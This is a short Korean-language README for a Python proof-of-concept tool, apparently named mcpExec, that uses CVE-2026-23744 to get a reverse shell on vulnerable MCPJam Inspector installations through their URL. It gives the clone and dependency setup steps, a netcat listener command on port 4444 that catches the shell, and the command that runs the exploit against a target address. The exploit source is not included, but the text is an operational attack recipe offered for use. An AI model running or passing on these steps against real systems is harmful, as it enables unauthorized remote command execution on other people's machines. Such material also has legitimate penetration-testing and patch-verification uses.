
CVE-2026-23744에 대한 파이썬 리버스 셸 PoC
mcpExec는 CVE-2026-23744를 이용하여 취약한 MCPJam Inspector 설치의 URL을 통해 리버스 셸을 획득하는 도구입니다.
git clone https://github.com/daemoncibsec/mcpExec.git
cd mcpExec
python3 -m venv venv
source venv/bin/activate
pip install rich
pip install argparse
pip install requests
chmod +x mcpExec.py
venv 종료:
deactivate
익스플로잇이 작동하도록 리스너를 열기:
nc -nvlp 4444
이 명령은 리버스 셸을 제공합니다 (해당 시스템에 Python3가 설치된 경우).
./mcpExec.py http://localhost:6274